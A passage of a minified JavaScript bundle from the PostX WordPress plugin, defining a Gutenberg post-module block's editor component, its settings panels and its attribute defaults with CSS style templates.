t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(30077),n=l(21910),r=l(76463);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-module-1/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-module-1.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postmodule1.svg"}},edit:i.Z,save:()=>null})},64988:(e,t,l)=>{"use strict";l.d(t,{Z:()=>B});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(46896),c=l(71411),u=l(8152),d=l(76005),m=l(99838),g=l(31760),y=l(73151),b=l(69735),v=l(2963),h=l(39349),f=l(87025),k=l(29982);const{__}=wp.i18n,{InspectorControls:w,useBlockProps:x}=wp.blockEditor,{useEffect:T,useState:_,useRef:C,Fragment:E}=wp.element,{Spinner:S,Placeholder:P}=wp.components,{getBlockAttributes:L,getBlockRootClientId:I}=wp.data.select("core/block-editor");function B(e){const t=C(null),[l,B]=_(f.Ti),[U,M]=_(null),{setAttributes:A,name:H,attributes:N,className:j,context:Z,isSelected:O,clientId:R,attributes:{blockId:D,readMoreIcon:z,excerptLimit:F,showFullExcerpt:W,showSmallMeta:V,smallExcerptLimit:G,metaStyle:q,metaShow:$,catShow:K,metaSeparator:J,titleShow:Y,catStyle:X,catPosition:Q,titlePosition:ee,excerptShow:te,metaList:le,metaListSmall:oe,showSmallCat:ae,readMore:ie,readMoreText:ne,showSmallBtn:re,showSmallExcerpt:se,varticalAlign:pe,columnFlip:ce,metaPosition:ue,layout:de,customCatColor:me,onlyCatColor:ge,contentTag:ye,titleTag:be,showSeoMeta:ve,titleLength:he,metaMinText:fe,metaAuthorPrefix:ke,titleStyle:we,metaDateFormat:xe,authorLink:Te,vidIconEnable:_e,notFoundMessage:Ce,dcEnabled:Ee,dcFields:Se,previewImg:Pe,advanceId:Le,headingShow:Ie,filterShow:Be,paginationShow:Ue,paginationType:Me,navPosition:Ae,V4_1_0_CompCheck:{runComp:He},currentPostId:Ne}}=e;function je(e){B({...l,selectedDC:e})}function Ze(){B({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Oe(e){B({...l,section:{...f.ZQ,[e]:!0}}),(0,f.Rt)(e),(0,f.ob)(e),M("setting")}function Re(e){B((t=>({...t,toolbarSettings:e}))),(0,f.os)(e)}function De(){l.error&&B({...l,error:!1}),l.loading||B({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(N)}).then((e=>{B({...l,postsList:e,loading:!1})})).catch((e=>{B({...l,loading:!1,error:!0})}))}T((()=>{(0,f.oA)(),De()}),[]),T((()=>{const t=R.substr(0,6),l=L(I(R));(0,a.qi)(A,l,Ne,R),(0,y.h)(e),D?D&&D!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||A({blockId:t})):(A({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&A({queryType:"archiveBuilder"}))}),[R]),T((()=>{const e=t.current;(0,b.o6)()&&0===N.dcFields.length&&A({dcFields:Array(k.PR).fill(void 0)}),e?((0,a.Qr)(e,N)&&(De(),t.current=N),e.isSelected!==O&&O&&(0,f.gT)(Oe,Re)):t.current=N}),[N]);const ze={settingTab:U,setSettingTab:M,setAttributes:A,name:H,attributes:N,setSection:Oe,section:l.section,clientId:R,context:Z,setSelectedDc:je,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){je(e),Re("dc_group")}};let Fe;if(D&&(Fe=(0,m.Kh)(N,"ultimate-post/post-module-2",D,(0,a.k0)())),Pe)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Pe});const We=x({...Le&&{id:Le},className:`ultp-block-${D} ${j}`,onClick:e=>{e.stopPropagation(),Oe("general"),Re("")}});return(0,o.createElement)(E,null,(0,o.createElement)(k.FP,{store:ze,selected:l.toolbarSettings}),(0,o.createElement)(w,null,(0,o.createElement)(k.ZP,{store:ze})),(0,o.createElement)(g.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",exclude:["columns","spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-module-2",key:"layout",options:[{img:"assets/img/layouts/pm2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm2/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Grid Features","ultimate-post"),new:a.KE,[He?"exclude":"dep"]:a.N2}],store:ze}),(0,o.createElement)("div",We,Fe&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Fe}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(Ie||Be||Ue)&&(0,o.createElement)(r.m,{attributes:N,setAttributes:A,onClick:()=>{Oe("heading"),Re("heading")},setSection:Oe,setToolbarSettings:Re}),function(){const e=`${ye}`,t=[],a=[],r=(e,t)=>(0,b.o6)()&&Ee&&(0,o.createElement)(h.Z,{idx:e,postId:t,fields:Se,settingsOnClick:(e,t)=>{e?.stopPropagation(),Re(t)},selectedDC:l.selectedDC,setSelectedDc:je,setAttributes:A,dcFields:Se});return l.error?(0,o.createElement)(P,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(S,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-post-module2 ultp-block-content-${pe} ultp-block-content-${ce} ultp-${de}`},l.postsList.map(((l,c)=>{const m=0==c?JSON.parse(le.replaceAll("u0022",'"')):JSON.parse(oe.replaceAll("u0022",'"'));(0==c?t:a).push((0,o.createElement)(e,{key:c,className:`ultp-block-item post-id-${l.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)(s.kS,{attributes:N,post:l,idx:c,VideoContent:_e&&l.has_video?(0,o.createElement)(s.nk,{onClick:e=>{e.preventDefault(),Oe("video"),Re("video")}}):null,CatCotent:0!==c&&!ae||"aboveTitle"==Q?null:(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:X,catPosition:Q,customCatColor:me,onlyCatColor:ge,onClick:e=>{Oe("taxonomy-/-category"),Re("cat")}})),onClick:()=>{Oe("image"),Re("image")}}),(0,o.createElement)("div",{className:"ultp-block-content"},r(7,l.ID),"aboveTitle"==Q&&(0===c||ae)&&(0,o.createElement)(i.Z,{post:l,catShow:K,catStyle:X,catPosition:Q,customCatColor:me,onlyCatColor:ge,onClick:e=>{Oe("taxonomy-/-category"),Re("cat")}}),r(6,l.ID),l.title&&Y&&1==ee&&(0,o.createElement)(d.Z,{title:l.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{Oe("title"),Re("title")}}),r(5,l.ID),(0===c||V)&&$&&"top"==ue&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:J,metaStyle:q,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{Oe("meta"),Re("meta")}}),r(4,l.ID),l.title&&Y&&0==ee&&(0,o.createElement)(d.Z,{title:l.title,headingTag:be,titleLength:he,titleStyle:we,onClick:e=>{Oe("title"),Re("title")}}),r(3,l.ID),0==c&&te&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:F,showFullExcerpt:W,showSeoMeta:ve,onClick:e=>{Oe("excerpt"),Re("excerpt")}}),0!=c&&se&&(0,o.createElement)(n.Z,{excerpt:l.excerpt,excerpt_full:l.excerpt_full,seo_meta:l.seo_meta,excerptLimit:G,showFullExcerpt:W,showSeoMeta:ve,onClick:e=>{Oe("excerpt"),Re("excerpt")}}),r(2,l.ID),(0===c||re)&&ie&&(0,o.createElement)(u.Z,{readMoreText:ne,readMoreIcon:z,titleLabel:l.title,onClick:()=>{Oe("read-more"),Re("read-more")}}),r(1,l.ID),(0===c||V)&&$&&"bottom"==ue&&(0,o.createElement)(p.Z,{meta:m,post:l,metaSeparator:J,metaStyle:q,metaMinText:fe,metaAuthorPrefix:ke,metaDateFormat:xe,authorLink:Te,onClick:e=>{Oe("meta"),Re("meta")}}),r(0,l.ID),(0,b.o6)()&&Ee&&(0,o.createElement)(v.Z,{dcFields:Se,setAttributes:A,startOnboarding:Ze})))))})),(0,o.createElement)("div",{className:"ultp-big-post-module2"},t),(0,o.createElement)("div",{className:"ultp-small-post-module2"},a)):(0,o.createElement)(P,{className:"ultp-backend-block-loading",label:Ce})}(),Ue&&"navigation"==Me&&"topRight"!=Ae&&(0,o.createElement)(c.Z,{onClick:()=>{Oe("pagination"),Re("pagination")}}))))}},29982:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6827",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:b.general,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},exclude:["columns"],include:[{position:0,data:{type:"layout",block:"post-module-2",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pm2/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pm2/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pm2/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pm2/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pm2/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]}},{position:4,data:{type:"range",key:"largeHeight",min:0,max:800,step:1,unit:!0,responsive:!0,_inline:!0,label:__("Large Image Height","ultimate-post")}},{position:6,data:{type:"toggle",key:"columnFlip",label:__("Flip Layout","ultimate-post"),pro:!0}},{position:5,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,include:[{position:6,data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}},{position:7,data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{position:8,data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],hrIdx:[4,12]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,depend:"showImage",exclude:["imgMargin"],include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],hrIdx:[{tab:"settings",hr:[3,11]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,initialOpen:b.meta,depend:"metaShow",exclude:["metaSeparator","metaStyle","metaList","metaListSmall"],include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF},{position:15,data:{tab:"style",type:"color",key:"LargeMetaColor",label:__("Large Post Meta Color","ultimate-post")}},{position:16,data:{tab:"style",type:"color",key:"LgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],hrIdx:[{tab:"style",hr:[9]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",exclude:["catPosition"],include:[{position:0,data:{type:"toggle",tab:"settings",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,initialOpen:b.excerpt,depend:"excerptShow",include:[{position:0,data:{type:"toggle",key:"excerptShow",label:__("Large Item Excerpt","ultimate-post")}},{position:1,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:6,data:{type:"color",key:"excerptBigColor",label:__("Large Excerpt Color","ultimate-post")}},{position:4,data:{type:"range",key:"smallExcerptLimit",min:0,max:500,step:1,help:"Excerpt Limit from Post Content.",label:__("Small Excerpt Limit","ultimate-post")}}],store:t,hrIdx:[6,9]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore",include:[{position:0,data:{tab:"settings",type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}]}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),("layout4"===l||"layout5"===l)&&(0,o.createElement)(a.wT,{store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",store:t}),(0,o.createElement)(a.O2,{store:t,include:[{position:3,data:{type:"dimension",key:"lgInnerPadding",label:__("Large Content Padding","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],exclude:["contenWraptWidth","contenWraptHeight"]}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow",hrIdx:[{tab:"settings",hr:[{idx:1,label:__("Heading Settings","ultimate-posts")},{idx:8,label:__("Subheading Settings","ultimate-posts")}]},{tab:"style",hr:[{idx:1,label:__("Heading Style","ultimate-posts")},{idx:12,label:__("Subheading Style","ultimate-posts")}]}]}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",exclude:["filterType","filterValue"],include:[{position:2,data:a.YA},{position:3,data:a.sx}],hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,store:t,initialOpen:b.pagination,depend:"paginationShow",include:[{position:1,data:{type:"select",key:"paginationType",pro:!0,label:__("Pagination Type","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exclude:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition","pagiMargin"],hrIdx:[{tab:"style",hr:[4]}]}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,incSettings:[{position:1,data:a.YA},{position:2,data:a.sx}],exSettings:["filterType","filterValue"],exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiPadding","navMargin"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,incSettings:[{position:0,data:{type:"select",key:"paginationType",label:__("Pagination Type","ultimate-post"),pro:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"navigation",label:__("Navigation","ultimate-post")}]}},{position:2,data:a.dT}],exStyle:["pagiTypo","pagiMargin","pagiPadding","navMargin"],exSettings:["paginationType","paginationAjax","loadMoreText","paginationText","navPosition"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo",{data:{type:"typography",key:"titleLgTypo",label:__("Typography Large Title","ultimate-post")}}],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor",{data:{type:"color",key:"lgTitleColor",label:__("Large Title Color","ultimate-post")}},{data:{type:"color",key:"lgTitleHoverColor",label:__("Large Title Hover Color","ultimate-post")}}],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({include:[{data:{type:"dimension",key:"titleLgPadding",label:__("Padding Large Item","ultimate-post"),step:1,unit:!0,responsive:!0}}],exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:[{data:{type:"color",key:"excerptBigColor",label:__("Large Excerpt Color","ultimate-post")}}],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({include:[{position:0,data:{type:"toggle",key:"excerptShow",label:__("Large Item Excerpt","ultimate-post")}},{position:1,data:{type:"toggle",key:"showSmallExcerpt",label:__("Small Item Excerpt","ultimate-post")}},{position:4,data:{type:"range",key:"smallExcerptLimit",min:0,max:500,step:1,help:"Excerpt Limit from Post Content.",label:__("Small Excerpt Limit","ultimate-post")}}],exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,incSettings:[{position:0,data:{type:"toggle",key:"showSmallMeta",label:__("Small Item Meta","ultimate-post")}},{position:1,data:a.do},{position:3,data:a.Rd},{position:4,data:a.WD},{position:7,data:a.MF}],incStyle:[{position:4,data:{type:"color",key:"LargeMetaColor",label:__("Large Post Meta Color","ultimate-post")}},{position:5,data:{type:"color",key:"LgMetaHoverColor",label:__("Large Meta Hover Color","ultimate-post")}}],exSettings:["metaSeparator","metaStyle","metaList","metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,incSettings:[{position:0,data:{type:"toggle",key:"showSmallBtn",label:__("Small Item Read More","ultimate-post")}}],exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,incSettings:[{position:0,data:{type:"toggle",key:"showSmallCat",label:__("Small Item Category","ultimate-post")}},{position:1,data:a.WJ}],exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exStyle:["imgMargin"]}));default:return null}}},16128:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!1},columnGridGap:{type:"object",default:{lg:"15",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-post-module2 { margin: 0 -{{columnGridGap}};}    \n          {{ULTP}} .ultp-block-post-module2 .ultp-big-post-module2,    \n          {{ULTP}} .ultp-block-post-module2 .ultp-small-post-module2 { padding: 0 {{columnGridGap}};}    \n          {{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},largeHeight:{type:"object",default:{lg:"450",unit:"px"},style:[{selector:"{{ULTP}} .ultp-big-post-module2 .ultp-block-content-wrap .ultp-block-image img {width: 100%; object-fit: cover; height: {{largeHeight}};}"}]},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, 